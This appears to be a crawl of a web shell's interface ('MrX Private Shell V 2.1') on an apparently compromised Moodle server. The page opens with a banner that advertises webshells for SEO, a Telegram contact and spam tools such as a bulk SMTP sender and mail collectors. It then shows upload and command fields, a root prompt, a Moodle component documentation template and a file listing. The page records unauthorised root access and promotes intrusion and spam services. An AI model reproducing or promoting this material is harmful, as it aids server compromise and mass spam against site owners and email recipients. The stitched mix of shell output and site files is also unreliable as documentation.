__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.217.120: ~ $
---
layout: docs
title: "Example"
description: "This is an example page describing the example component"
date: 2020-01-28T10:13:29+01:00
draft: true
weight: 30
---

## How it works

The EXAMPLE is used to [...] . It can be found in Moodle on pages where [...]

## Example

Show what the example looks like in Moodle, if your component includes and JavaScript backend please describe how it is initiated.

{{< example >}}

<div class="example w-25 border border-secondary p-3">
    <button class="btn btn-primary btn-block" id="clickme">
        Click me
        <span id="waiting" class="spinner-grow-sm" role="status" aria-hidden="true"></span>
    </button>
</div>

{{#js}}
require(['jquery'], function($) {
    $('#clickme').on('click', function() {
        $('#waiting').toggleClass('spinner-grow');
    });
});
{{/js}}
{{< /example >}}

## Example explained

How can you use this example?
Are there any example pages in Moodle?
What are the different options you have for different contexts (places in Moodle)?
What colours can be used?
Can it be called from PHP and JavaScript

## JavaScript behavior

Showcase the different ways this buttons can behave:

Does it trigger any events, does it listen to events?
Does it require any core AMD modules?
Is there a webservice backend required?

## Accessibility

Descripbe the `aria-something` parts of the element. Are there any possible accessibility issues using this example?
What are the considerations for keyboard navigation?
What accessibile colors can be used?
How to test its accessibility?

Filemanager

Name Type Size Permission Actions
_index.md File 85 B 0644
actionmenu.md File 6.39 KB 0644
activityicons.md File 8.38 KB 0644
buttons.md File 5.9 KB 0644
coursecards.md File 6.26 KB 0644
dom-modal.md File 4.29 KB 0644
dropdowns.md File 13.23 KB 0644
dynamictabs.md File 2.87 KB 0644
example.md File 1.52 KB 0644
footer.md File 1.49 KB 0644
form-elements.md File 1.08 KB 0644
moodle-icons.md File 1.71 KB 0644
notifications.md File 2.55 KB 0644
search-input.md File 3.42 KB 0644
showmore.md File 1.18 KB 0644
toggle.md File 2.29 KB 0644
Filemanager